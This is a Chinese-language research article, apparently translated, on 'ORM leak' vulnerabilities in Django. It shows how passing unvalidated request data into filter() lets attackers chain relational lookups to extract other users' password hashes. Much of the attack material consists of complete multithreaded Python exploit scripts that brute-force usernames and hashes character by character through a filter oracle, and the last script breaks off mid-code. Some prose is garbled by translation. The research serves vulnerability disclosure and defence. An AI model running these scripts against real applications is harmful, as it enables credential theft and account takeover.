介绍
最近,我们发现了各种与对象关系映射器 (ORM) 的不安全使用有关的漏洞,这些漏洞可能被利用来转储敏感信息。这些问题的出现是因为开发人员认为 ORM 不会受到 SQL 注入的攻击,而没有考虑到允许未经验证的用户输入“安全”的ORM 方法可能会带来安全风险。
那么令人惊讶的是...你的 ORM 也可能引入其他漏洞......
在本系列文章中,我们将向您介绍我们称之为ORM 泄漏的漏洞类别,如果对 ORM 进行不安全的使用且事先未验证用户输入,则可能导致敏感数据泄漏。本文是关于 ORM 泄漏的两篇文章中的第一篇,本部分的重点是 Django ORM 以及如何使用关系过滤攻击来泄漏敏感数据。
因此请致电您的工程师,因为我们有一些 ORM 泄漏需要修复!
先前的研究
之前对ORM 泄漏漏洞的研究有限,因为该漏洞类别仅在过去两年内被调查过。
关于 ORM 泄漏漏洞的第一篇文章之一于 2023 年 1 月由Positive Security发表,名为《Ransacking your password reset tokens》。这篇文章介绍了Ransack 库的默认配置如何不安全地使用Active Record ORM,并可能被利用来泄漏相关模型中的敏感字段。该研究的范围仅限于Ransack 库,该库已在 Ransack v4.0.0 中添加了可查询属性和关联的允许列表。
在 Positive Security 发布对 Ransack 库的研究之前不久,我开始向Strapi披露我的漏洞套件,其中CVE-2023-22894是一个 ORM 泄漏漏洞,可被利用来泄漏管理员密码重置令牌并接管 Strapi 实例。以下是我在个人博客上发布的有关我的朋友Boegie19和我发现的 Strapi 漏洞的文章列表。
-
Strapi 版本 <=4.7.1 中存在多个严重漏洞
-
CVE-2023-34235:绕过 Strapi <= v4.10.7 中的过滤器验证
不幸的是,对于 Strapi 来说,CMS 是建立在 ORM 的错误使用之上的,他们为解决我最初的漏洞而实施的缓解策略仍然留下了边缘情况仍然存在漏洞的可能性。这些边缘情况仍在被发现,最新披露的内容如下:
-
CVE-2023-36472
-
CVE-2024-29181
自 2023 年初对 Strapi 进行研究以来,我亲自发现了其他 ORM Leak 漏洞,或者从其他研究人员那里听说了他们在开源项目中发现的漏洞,下面列出了一些示例:
-
CVE-2023-47117:Label Studio ORM 泄漏
-
CVE-2023-31133:Ghost CMS ORM 泄漏
-
CVE-2023-30843:有效负载 CMS ORM 泄漏
由于已经披露了许多有关 ORM 不安全使用的漏洞,并且我们在 elttam 的工作中也发现了这些问题,因此我们决定对漏洞类别进行进一步研究。
本研究的目标是:
-
定义什么是 ORM 泄漏漏洞以及利用该漏洞所需的条件。
-
演示针对不同 ORM 和数据库管理系统 (DBMS) 的各种攻击方法,以泄露敏感数据。
-
为将来调查 ORM 泄漏的研究奠定基础。
什么是 ORM
对象关系映射器 (ORM) 是允许开发人员轻松将代码对象存储在后端数据库上的库,其使用在软件开发中无处不在。ORM 为开发人员引入了一个抽象层,因此他们不再需要在代码中编写 SQL 语句,而是可以使用他们选择的编程语言封装数据操作。他们通过向开发人员提供 API 来实现这一点,该 API 允许定义数据如何存储在数据库中以及如何在模式/模型文件中相互关联,然后将其映射到代码对象(这称为映射逻辑)。通常,ORM 需要支持各种不同的数据库连接器,以便开发人员可以自由选择他们喜欢的数据库管理系统 (DBMS),例如 PostgreSQL、MySQL、MariaDB 或 SQLite。为此,ORM 在映射逻辑中有一个子系统,用于处理构建查询,称为查询生成器。查询生成器处理查询操作,并且在大多数情况下可以缓解 SQL 注入漏洞,这是建议使用 ORM 进行开发的主要原因之一。
为了帮助从开发人员的角度理解 ORM 的工作原理,让我们来看一个示例 Python Web 应用程序。
DJANGO ORM 实现示例
假设一位 Python 开发人员想要编写一个博客网站,供人们发布文章,并希望为其应用程序添加搜索功能。如果开发人员不想使用 ORM,那么开发人员必须在其代码中编写 SQL 语句,如下所示。
def search_articles(search_term: str) -> list[dict]:
results = []
with get_db_connection() as conn:
with conn.cursor() as cursor:
cursor.execute("SELECT title, body FROM articles WHERE title LIKE %s", (f"%{search_term}%",))
rows = cursor.fetchall()
for row in rows:
results.append({
"title": row[0],
"body": row[1]
})
return results
对于大多数简单用例来说,这已经足够了,但对于更复杂的数据结构和查询,需要具有专业 SQL 知识的开发人员来编写 SQL 语句。或者,可以使用 ORM(如Django Web 框架的Django ORM)在应用程序代码中编写查询,而不是使用 SQL 语句。我们可以在模型文件中定义数据存储在数据库中的结构,下面的代码片段显示了一个示例模型及其序列化器和视图。Article
models/article.py
from django.db import models
class Article(models.Model):
"""
The data model for Articles
"""
title = models.CharField(max_length=255)
body = models.TextField()
class Meta:
ordering = ["title"]
serializers/article.py
class ArticleSerializer(serializers.ModelSerializer):
"""
How objects of the Article model are serialized into other data types (e.g. JSON)
"""
class Meta:
model = Article
fields = ('title', 'body')
views/article.py
class ArticleView(APIView):
"""
Some basic API view that users send requests to for searching for articles
"""
def post(self, request: Request, format=None):
# Returns the search URL parameter if present otherwise it is set to None
search_term = request.data.get("search", None)
if search_term is not None:
articles = Article.objects.filter(title__contains=search_term)
else:
articles Article.objects.all()
serializer = ArticleSerializer(articles, many=True)
return Response(serializer.data)
看上去已经漂亮多了。
ORM 的另一个非常有用的功能是ORM 的关系组件,您可以轻松地在其中编写不同模型之间的关系,这使得复杂的数据结构更容易在数据库中查询和存储。继续使用我们的 Django ORM 示例,假设我们要将以下内容Category和Author模型作为关系添加到我们的Article模型中:
Category模型
from django.db import models
class Category(models.Model):
name = models.CharField(max_length=255)
Author模型
from django.db import models
from django.contrib.auth.models import User
from app.models.department import Department
class Author(models.Model):
# An one-to-one mapping to the user that is associated to this author
# Reason why this is done is because for Django it is not recommended to modify the User model
user = models.OneToOneField(User, on_delete=models.CASCADE)
# An example how users could be organised into different groups
# In this example users are organised into Departments they work for
departments = models.ManyToManyField(Department, related_name='employees')
def __str__(self) -> str:
return f"{self.user.username}"
Department模型
from django.db import models
class Department(models.Model):
name = models.CharField(max_length=255)
def __str__(self) -> str:
return f"{self.name}"
我们现在可以轻松地定义模型中的关系映射Article,如下所示:
新Article模型
from django.db import models
from app.models.author import Author
from app.models.category import Category
class Article(models.Model):
title = models.CharField(max_length=255)
body = models.TextField()
categories = models.ManyToManyField(Category, related_name="articles")
created_by = models.ForeignKey(Author, on_delete=models.CASCADE)
def __str__(self) -> str:
return f"{self.title}-{self.created_by.user.username}"
class Meta:
ordering = ["title"]
为了帮助理解所有这些不同模型之间的关系,我创建了以下图表来显示这些关系。该User模型以粉红色突出显示,因为它是 Django 框架的内置模型。
现在,如果开发人员希望允许用户通过作者的用户名、类别或文章标题进行搜索,他们可以编写以下代码。
class ArticleView(APIView):
"""
Some basic API view that users send requests to for
searching for articles
"""
def post(self, request: Request, format=None):
title_search = request.data.get("title", "")
author_search = request.data.get("author", "")
category_search = request.data.get("category", "")
articles = Article.objects.filter(
title__contains=title_search,
# Search by username in the related User object in the Author
# object stored in the created_by for the Article
created_by__user__username__contains=author_search,
# Search by categories that contain the search term
categories__name__contains=category_search
)
serializer = ArticleSerializer(articles, many=True)
return Response(serializer.data)
ORM 的便利之处在于它抽象了 SQL 语句的生成,允许开发人员将开发时间集中在应用程序逻辑上,而不是编写 SQL 语句。
这种便利可能是一种变相的诅咒。
假设这个博客网站的开发人员接到上级的联系,提出以下要求:
-
我们希望有一个强大的 API 允许用户按Article模型中的任何字段进行过滤。
-
Article随着应用程序的开发,我们还将不断用新字段更改和其他相关模型,并希望 API 能够支持这些更改,而无需任何代码修改。
-
您有 2 个小时来实现这些要求。
开发人员可能首先会哭泣,然后将以下代码实现到视图中以允许用户通过模型的所有字段进行过滤Article。
class ArticleView(APIView):
"""
Some basic API view that users send requests to for
searching for articles
"""
def post(self, request: Request, format=None):
try:
articles = Article.objects.filter(**request.data)
serializer = ArticleSerializer(articles, many=True)
except Exception as e:
return Response([])
return Response(serializer.data)
那么这里可能出现什么问题呢?
ORM 如何泄漏
首先,我们以 Django 为例,演示如何利用 ORM 泄露敏感信息。我将从开发人员有时会犯的一个基本错误开始,即User过滤模型的记录。
from rest_framework.views import APIView
from rest_framework.request import Request
from rest_framework.response import Response
from django.contrib.auth.models import User
from app.serializers import UserSerializer
class UserView(APIView):
"""
A lovely view to see our users
"""
def post(self, request: Request, format=None):
"""
Query users
"""
try:
users = User.objects.filter(**request.data)
serializer = UserSerializer(users, many=True)
except Exception as e:
print(e)
return Response([])
return Response(serializer.data)
这里的问题是,Django ORM 使用关键字参数语法来构建QuerySet。由于解包运算符 ( **),用户可以控制filter方法的关键字参数来过滤他们要查找的内容。还有其他方法可以使用QuerySet构建用户生成的过滤器,但出于演示目的,解包运算符是最简单的。
幸运的是,在这种情况下开发人员没有返回所有字段,serializer而只返回了一个对象的name和。usernameUser
from rest_framework import serializers
from django.contrib.auth.models import User
class UserSerializer(serializers.ModelSerializer):
"""
Use serializer
"""
class Meta:
model = User
fields = ('username', 'first_name', 'last_name')
但是,该User模型还有更多字段,其中包含一些有用的数据,例如password。我们还可以控制filter方法的关键字参数,因此没有什么可以阻止我们使用用户密码进行过滤password。我们不知道密码的确切值,因此我们需要使用与用户密码片段匹配的过滤运算符password。幸运的是,Django 提供了一个startswith运算符来匹配字段的开头,因此我们可以password 逐个字符地泄漏完整的字符。
让我们来看一个泄露用户名为 的用户密码的例子karen。以下 POST 请求将过滤用户名为karen且密码以 字符开头的a用户。这应该返回一个空列表,因为 Django 密码哈希的前缀为pbkdf2_sha256$。
POST 请求过滤用户名karen和密码以 开头的用户a,返回预期的空列表
当我们过滤密码是否以字符p开头时,会返回一个非空列表,因为它与密码前缀的开头匹配。这被称为过滤器预言,因为响应长度的变化表明字符与我们想要泄漏的值匹配。
POST 请求过滤用户名karen和密码以 开头的用户p,返回一个非空列表,表明密码以 开头p
可以使用 中的下一个字符重复该过程,password直到我们在通过 进行过滤时看到响应再次发生变化pb。
一旦我们确认可以利用此 ORM 泄漏漏洞逐个字符地泄露用户密码,我们就可以编写一个 PoC 脚本,制作出非常酷的漏洞利用 GIF。
import requests, string, sys
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor
TARGET = "http://127.0.0.1:8000/api/user/?format=json"
CHARS = string.ascii_letters + string.digits + "$/=+_"
THREADS = 20
def worker(username: str, known_dumped: str, c: str) -> tuple[bool, str]:
r = requests.post(
TARGET,
json={
"username": username,
"password__startswith": known_dumped + c
}
)
r_json: dict = r.json()
return len(r_json) > 0, known_dumped + c
def exploit(username: str):
dumped_value = ""
print(f"r{Fore.GREEN}username: {Fore.BLUE}{Style.BRIGHT}{username}{Style.RESET_ALL}")
print(f"r{Fore.RED}password: {Fore.YELLOW}{Style.BRIGHT}{dumped_value}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = executor.map(worker, [username]*len(CHARS), [dumped_value]*len(CHARS), CHARS)
for result in futures:
was_success = result[0]
test_substring = result[1]
print(f"r{Fore.RED}password: {Fore.YELLOW}{Style.BRIGHT}{test_substring}{Style.RESET_ALL}", end="")
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
break
if not found:
break
print(f"r{Fore.RED}password: {Fore.YELLOW}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
def main():
exploit("karen")
if __name__ == "__main__":
main()
此示例为 ORM 泄漏漏洞的条件建立了明确的定义。
ORM 泄漏漏洞的条件
-
攻击者可以控制过滤结果的列。
-
ORM 支持匹配值片段的运算符。合适的运算符使用LIKE生成的查询中的 SQL 条件、使用攻击者控制的模式执行正则表达式匹配或允许比较运算符(例如<, )>。
-
攻击者可以控制过滤器的操作员。
-
查询的模型有一个不想泄露的敏感字段。
上述 4 个条件均是造成 ORM 泄漏漏洞的必要条件。然而,本例中展示的漏洞被认为是微不足道的,而当我们查看“对象关系映射器”的关系部分时,事情就变得有趣了。
针对 DJANGO ORM 的关系过滤攻击
在 Web API 中构建强大的过滤功能已成为一种趋势,尤其是对于 Python 和 JavaScript 等无类型语言,因为无类型语言本质上比类型语言更具动态性。为了满足这些日益增长的需求以及简化软件开发的普遍要求,一些 ORM 引入了新功能,允许更轻松地跨关系和新威胁进行查询。
如果 ORM 支持通过相关模型上字段的值过滤对象,而无需在代码中启用这种关系过滤,那么攻击者可以链接关系字段,然后访问敏感数据,这就是我们所说的关系过滤攻击。
在本节中,我将介绍在本研究项目期间调查的可以对 Django ORM 进行的各种关系过滤攻击。
基本关系过滤攻击
让我们回到本文开头的 Django ORM 示例,我们有以下代码允许ArticleView用户过滤Article对象。
class ArticleView(APIView):
"""
Some basic API view that users send requests to for
searching for articles
"""
def post(self, request: Request, format=None):
try:
articles = Article.objects.filter(**request.data)
serializer = ArticleSerializer(articles, many=True)
except Exception as e:
return Response([])
return Response(serializer.data)
这里比较棘手的是,Django ORM 支持关系过滤,这使得攻击者可以对相关字段执行关系过滤攻击。
让我们再看一下显示模型之间关系的图表并规划关系过滤攻击。
我们正在过滤Article模型上的对象,因此这是我们的入口点Author。我们还通过模型created_by中的字段与模型进行了一对一映射Article。该模型还通过字段Author与 Django 模型进行了一对一映射,该字段具有我们想要提取的非常有用的字段。现在,我们有一条可能的攻击路径,可以攻击创建了的用户,如下所示。Useruser passwordpasswordArticle
将其转换为针对 Django ORM 的关系过滤攻击负载,我们的负载将通过使用、或Django ORM 运算created_by__user__password符创建文章的用户的密码哈希进行过滤。containsstartswithregex
让我们确认一下这一点,首先,我们检查当我们尝试通过不在密码哈希中的子字符串进行过滤时是否返回空响应(例如DEFINITELY_NOT_IN_PASSWORD)。
正如预期的那样,返回了一个空列表,但接下来我们需要检查是否可以按密码中可能存在的值进行过滤,例如pbkdf2_sha256(密码哈希前缀)。
是的,现在只需编写一个 PoC 并开始转储该用户的密码哈希。
import requests, string, sys
import urllib.parse as urlparse
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor, Future
TARGET = "http://127.0.0.1:8000/api/articles/"
CHARS = string.ascii_letters + string.digits + "$/=+_"
THREADS = 20
def worker(test_substring_value: str) -> tuple[bool, str]:
r = requests.post(
TARGET,
json={
"created_by__user__password__contains": test_substring_value
}
)
r_json: dict = r.json()
return len(r_json) > 0, test_substring_value
def main():
dumped_value = ""
print(f"r{Fore.RED}dumped password: {Fore.YELLOW}{Style.BRIGHT}{dumped_value}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = []
for test_char in CHARS:
# Since we are using a contains operator, need to add the test char on both sides
job_suffix = executor.submit(
worker,
dumped_value + test_char
)
futures.append(job_suffix)
job_prefix = executor.submit(
worker,
test_char + dumped_value
)
futures.append(job_prefix)
future: Future
for future in futures:
result = future.result()
was_success = result[0]
test_substring = result[1]
print(f"r{Fore.RED}dumped password: {Fore.YELLOW}{Style.BRIGHT}{test_substring}{Style.RESET_ALL}", end="")
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
break
if not found:
break
print(f"r{Fore.RED}dumped password: {Fore.YELLOW}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
if __name__ == "__main__":
main()
我们确实有一个小问题。当前的关系过滤负载(created_by__user__password)通过过滤对象进行一对一映射过滤Article,目前仅限于已创建的用户Article。但是,在某些情况下,我们需要转储与我们的入口点没有直接关联的不同用户的敏感数据。
利用多对多关系
让我们再次回顾一下该关系图。
注意到模型与模型之间Author存在多对多Department关系吗?我们可以利用这种多对多关系,通过与Department创建过 的用户共享相同帐户的用户帐户进行筛选Article。现在我们的关系筛选链变为created_by__departments__employees__user。
为了演示,假设我创建了两个共享文章的用户,Department但其中只有一个发布了文章。
用户名 部门 已发表文章
凯伦 销售量 真的
经理杰夫销售、经理错误的
jeff-the-manager我们仍然可以使用关系过滤负载 来获取密码哈希created_by__departments__employees__user,并按照以下步骤操作。
-
首先通过过滤获取所有用户 ID created_by__departments__employees__user__id。
-
对于每个ID,首先泄露该账户的用户名created_by__departments__employees__user__username。
-
然后使用 泄露账户的密码哈希created_by__departments__employees__user__password。
以下 PoC 泄露了Department与已创建 的用户共享 的帐户的所有用户名和密码Article。
import requests, string, sys
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor, Future
TARGET = "http://127.0.0.1:8000/api/articles/"
CHARS = {
"username": string.ascii_letters + "-",
"password": string.ascii_letters + string.digits + "$/=+_"
}
THREADS = 20
def send_payload(payload: dict) -> list:
r = requests.post(TARGET, json=payload)
return r.json()
def worker(id: int, column_to_leak: str, test_substring_value: str) -> tuple[bool, str]:
payload = {
f"created_by__departments__employees__user__{column_to_leak}__startswith": test_substring_value,
"created_by__departments__employees__user__id": id
}
r_json = send_payload(payload)
return len(r_json) > 0, test_substring_value
def user_has_perms(id: int, perm: str) -> bool:
payload = {
f"created_by__departments__employees__user__{perm}": int(True),
"created_by__departments__employees__user__id": id
}
return len(send_payload(payload)) > 0
def get_user_ids(max_ids: int = 100) -> list[int]:
ids = []
for id in range(max_ids):
payload = {
"created_by__departments__employees__user__id": id
}
r_json = send_payload(payload)
if len(r_json) > 0:
ids.append(id)
return ids
def exploit(id: int, column_to_leak: str):
chars = CHARS[column_to_leak]
dumped_value = ""
print(f"r{Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = []
for test_char in chars:
# Using startswith operator so only add test char to end
job_suffix = executor.submit(worker, id, column_to_leak, dumped_value + test_char)
futures.append(job_suffix)
future: Future
for future in futures:
result = future.result()
was_success = result[0]
test_substring = result[1]
print(f"r{Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{test_substring}{Style.RESET_ALL}", end="")
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
executor.shutdown(wait=False, cancel_futures=True)
break
if not found:
break
print(f"r{Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
def main():
user_ids = get_user_ids()
for user_id in user_ids:
print(f"{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{user_id}{Style.RESET_ALL}")
exploit(user_id, "username")
exploit(user_id, "password")
print(f"{Fore.GREEN}is_active: {Fore.CYAN}{Style.BRIGHT}{user_has_perms(user_id, 'is_active')}{Style.RESET_ALL}")
print(f"{Fore.GREEN}is_staff: {Fore.CYAN}{Style.BRIGHT}{user_has_perms(user_id, 'is_staff')}{Style.RESET_ALL}")
print(f"{Fore.GREEN}is_superuser: {Fore.CYAN}{Style.BRIGHT}{user_has_perms(user_id, 'is_superuser')}{Style.RESET_ALL}")
print()
if __name__ == "__main__":
main()
现在假设有一大批员工被雇用,并列在下面,以及他们所属的部门,而该用户karen仍然是唯一发布过文章的用户。
用户名部门已发表文章
凯伦销售量真的
经理杰夫销售、经理错误的
经理莎朗工程、经理错误的
麦克风工程、IT错误的
埃洛伊斯它错误的
下图直观地展示了此场景中从已发布对象开始的User和对象之间的关系映射。DepartmentArticle
使用我们当前的有效载荷(created_by__departments__employees__user),我们只会过滤与发布过文章的其他用户共享一个部门的用户,这些用户只能转储 karen 和 jeff-the-manager 的密码哈希值。
我们可以循环多对多关系,并通过将另一个关系插入到我们的有效负载中,按与发布文章的用户共享部门的用户的共享部门进行筛选departments__employees。我们可以根据需要多次插入此多对多关系循环,以枚举所有共享关系并泄露我们可以接触到的所有信息。
以下 PoC 脚本username通过循环多对多关系来泄漏所有用户的信息departments__employees,直到不再发现新用户(或者我们对服务器实施 DoS 攻击)。
import requests, string, sys
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor, Future
TARGET = "http://127.0.0.1:8000/api/articles/"
CHARS = {
"username": string.ascii_letters + "-",
"password": string.ascii_letters + string.digits + "$/=+_"
}
THREADS = 20
def send_payload(payload: dict) -> list:
r = requests.post(TARGET, json=payload, timeout=8)
return r.json()
def worker(base_payload: str, id: int, column_to_leak: str, test_substring_value: str) -> tuple[bool, str]:
payload = {
f"{base_payload}__{column_to_leak}__startswith": test_substring_value,
f"{base_payload}__id": id
}
r_json = send_payload(payload)
return len(r_json) > 0, test_substring_value
def get_user_ids(base_payload: str, max_ids: int = 10) -> list[int]:
ids = []
for id in range(max_ids):
payload = {
f"{base_payload}__id": id
}
r_json = send_payload(payload)
if len(r_json) > 0:
ids.append(id)
return ids
def exploit(base_payload: str, id: int, column_to_leak: str):
chars = CHARS[column_to_leak]
dumped_value = ""
print(f"r{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = []
for test_char in chars:
# Using startswith operator so only add test char to end
job_suffix = executor.submit(worker, base_payload, id, column_to_leak, dumped_value + test_char)
futures.append(job_suffix)
future: Future
for future in futures:
result = future.result()
was_success = result[0]
test_substring = result[1]
print(f"r{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{test_substring}{Style.RESET_ALL}", end="")
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
executor.shutdown(wait=False, cancel_futures=True)
break
if not found:
break
print(f"r{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
def main():
seen_user_ids = []
m2m_payload = "created_by__departments__employees"
user_payload = "__user"
while True:
base_payload = m2m_payload + user_payload
print(f"{Fore.GREEN}base payload: {Fore.CYAN}{Style.BRIGHT}{base_payload}{Style.RESET_ALL}")
try:
user_ids = get_user_ids(base_payload)
except requests.exceptions.ReadTimeout as e:
print(f"{Fore.RED}{Style.BRIGHT}base payload has too many m2m loop backs and is now dosing the server{Style.RESET_ALL}")
break
discovered_new = False
for user_id in user_ids:
if user_id in seen_user_ids:
print(f"{Style.DIM}Skipping already leaked user with id {Fore.CYAN}{user_id}{Style.RESET_ALL}")
continue
discovered_new = True
seen_user_ids.append(user_id)
exploit(base_payload, user_id, "username")
# Commented out so this can be done quickly
# exploit(base_payload, user_id, "password")
if not discovered_new:
break
# Looping back on the many-to-many relationship
m2m_payload = m2m_payload + "__departments__employees"
if __name__ == "__main__":
main()
Author利用关系过滤负载中的和模型之间的多对多关系,Department我们可以泄露远不止滥用一对一关系的信息。但情况可能并非总是如此,例如,如果未定义多对多关系,或者我们想要泄露的目标用户与任何其他用户没有共享实体。
我们仍然可以在 Django 中获取泄漏数据
使用 DJANGOGROUP和PERMISSION模型
如前所述,该User模型是 Django 的内置模型,用于管理身份验证和授权。因此,让我们深入研究 Django 的代码,仔细看看该内置User模型。
User班级
class User(AbstractUser):
"""
Users within the Django authentication system are represented by this
model.
Username and password are required. Other fields are optional.
"""
class Meta(AbstractUser.Meta):
swappable = "AUTH_USER_MODEL"
该类User扩展了AbstractUser下面显示的类:
AbstractUser模型的字段
class AbstractUser(AbstractBaseUser, PermissionsMixin):
"""
An abstract base class implementing a fully featured User model with
admin-compliant permissions.
Username and password are required. Other fields are optional.
"""
username_validator = UnicodeUsernameValidator()
username = models.CharField(
_("username"),
max_length=150,
unique=True,
help_text=_(
"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only."
),
validators=[username_validator],
error_messages={
"unique": _("A user with that username already exists."),
},
)
first_name = models.CharField(_("first name"), max_length=150, blank=True)
last_name = models.CharField(_("last name"), max_length=150, blank=True)
email = models.EmailField(_("email address"), blank=True)
is_staff = models.BooleanField(
_("staff status"),
default=False,
help_text=_("Designates whether the user can log into this admin site."),
)
is_active = models.BooleanField(
_("active"),
default=True,
help_text=_(
"Designates whether this user should be treated as active. "
"Unselect this instead of deleting accounts."
),
)
date_joined = models.DateTimeField(_("date joined"), default=timezone.now)
该类AbstractUser扩展了该类AbstractBaseUser,添加了以下password字段:
AbstraceBaseUser模型的字段
class AbstractBaseUser(models.Model):
password = models.CharField(_("password"), max_length=128)
last_login = models.DateTimeField(_("last login"), blank=True, null=True)
is_active = True
但是,继承自的有趣类AbstractUser是PermissionsMixin。
PermissionsMixin模型的字段
class PermissionsMixin(models.Model):
"""
Add the fields and methods necessary to support the Group and Permission
models using the ModelBackend.
"""
is_superuser = models.BooleanField(
_("superuser status"),
default=False,
help_text=_(
"Designates that this user has all permissions without "
"explicitly assigning them."
),
)
groups = models.ManyToManyField(
Group,
verbose_name=_("groups"),
blank=True,
help_text=_(
"The groups this user belongs to. A user will get all permissions "
"granted to each of their groups."
),
related_name="user_set",
related_query_name="user",
)
user_permissions = models.ManyToManyField(
Permission,
verbose_name=_("user permissions"),
blank=True,
help_text=_("Specific permissions for this user."),
related_name="user_set",
related_query_name="user",
)
哦,你看,我们有 2 个多对多关系字段与Group和Permission模型。这两个模型都用于管理 Django 中的用户权限和授权。对于我们黑客来说,有趣的是 related_query_name通过userPermissionsMixin继承链接回和User模型。
因此,让我们扩展我们的关系图并包括以粉红色突出显示的 Django 内置模型。
然后,我们可以按共享相同Group(created_by__user__groups__user__password)的用户或按被分配相同Permission(created_by__user__user_permissions__user__password)的用户进行筛选。
这是另一个很酷的 PoC 。
import requests, string, sys
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor, Future
TARGET = "http://127.0.0.1:8000/api/articles/"
CHARS = {
"username": string.ascii_letters + "-",
"password": string.ascii_letters + string.digits + "$/=+_"
}
THREADS = 20
def send_payload(payload: dict) -> list:
r = requests.post(TARGET, json=payload, timeout=8)
return r.json()
def worker(base_payload: str, id: int, column_to_leak: str, test_substring_value: str) -> tuple[bool, str]:
payload = {
f"{base_payload}__{column_to_leak}__startswith": test_substring_value,
f"{base_payload}__id": id
}
r_json = send_payload(payload)
return len(r_json) > 0, test_substring_value
def get_user_ids(base_payload: str, max_ids: int = 10) -> list[int]:
ids = []
for id in range(max_ids):
payload = {
f"{base_payload}__id": id
}
r_json = send_payload(payload)
if len(r_json) > 0:
ids.append(id)
return ids
def exploit(base_payload: str, id: int, column_to_leak: str):
chars = CHARS[column_to_leak]
dumped_value = ""
print(f"r{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = []
for test_char in chars:
# Using startswith operator so only add test char to end
job_suffix = executor.submit(worker, base_payload, id, column_to_leak, dumped_value + test_char)
futures.append(job_suffix)
future: Future
for future in futures:
result = future.result()
was_success = result[0]
test_substring = result[1]
print(f"r{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{test_substring}{Style.RESET_ALL}", end="")
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
executor.shutdown(wait=False, cancel_futures=True)
break
if not found:
break
print(f"r{Fore.GREEN}user id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
def main():
seen_user_ids = []
to_user_payload = "created_by__user"
m2m_payloads = [
"__groups__user",
"__user_permissions__user"
]
for m2m_payload in m2m_payloads:
base_payload = to_user_payload + m2m_payload
print(f"{Fore.GREEN}base payload: {Fore.CYAN}{Style.BRIGHT}{base_payload}{Style.RESET_ALL}")
try:
user_ids = get_user_ids(base_payload)
except requests.exceptions.ReadTimeout as e:
print(f"{Fore.RED}{Style.BRIGHT}base payload has too many m2m loop backs and is now dosing the server{Style.RESET_ALL}")
break
discovered_new = False
for user_id in user_ids:
if user_id in seen_user_ids:
print(f"{Style.DIM}Skipping already leaked user with id {Fore.CYAN}{user_id}{Style.RESET_ALL}")
continue
discovered_new = True
seen_user_ids.append(user_id)
exploit(base_payload, user_id, "username")
# Commented out so this can be done quickly
# exploit(base_payload, user_id, "password")
if not discovered_new:
break
if __name__ == "__main__":
main()
class Article(models.Model):
title = models.CharField(max_length=255)
body = models.TextField()
categories = models.ManyToManyField(Category, related_name="articles")
created_by = models.ForeignKey(Author, on_delete=models.CASCADE)
is_secret = models.BooleanField(default=True)
def __str__(self) -> str:
return f"{self.title}-{self.created_by.user.username}"
class Meta:
ordering = ["title"]
def post(self, request: Request, format=None):
"""
Query articles
"""
try:
articles = Article.objects.filter(is_secret=False, **request.data)
serializer = ArticleSerializer(articles, many=True)
except Exception as e:
print(e)
return Response([])
return Response(serializer.data)
SELECT `app_article`.`id`, `app_article`.`title`, `app_article`.`body`, `app_article`.`created_by_id`, `app_article`.`is_secret` FROM `app_article`
INNER JOIN `app_article_categories` ON (`app_article`.`id` = `app_article_categories`.`article_id`)
INNER JOIN `app_category` ON (`app_article_categories`.`category_id` = `app_category`.`id`)
INNER JOIN `app_article_categories` T4 ON (`app_category`.`id` = T4.`category_id`)
WHERE (T4.`article_id` = 2 AND `app_article`.`is_secret` = 0) ORDER BY `app_article`.`title` ASC;
无论如何,让我们回到酷炫的 PoC 和 图片示例。
Django 的过滤器绕过 PoC 示例
import requests, string, sys
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor, Future
TARGET = "http://127.0.0.1:8000/api/articles/"
CHARS = {
"title": string.ascii_letters + " .",
"body": string.ascii_letters + string.digits + " .",
}
THREADS = 20
def send_payload(payload: dict) -> list:
r = requests.post(TARGET, json=payload, timeout=8)
return r.json()
def worker(base_payload: str, id: int, column_to_leak: str, test_substring_value: str) -> tuple[bool, str]:
payload = {
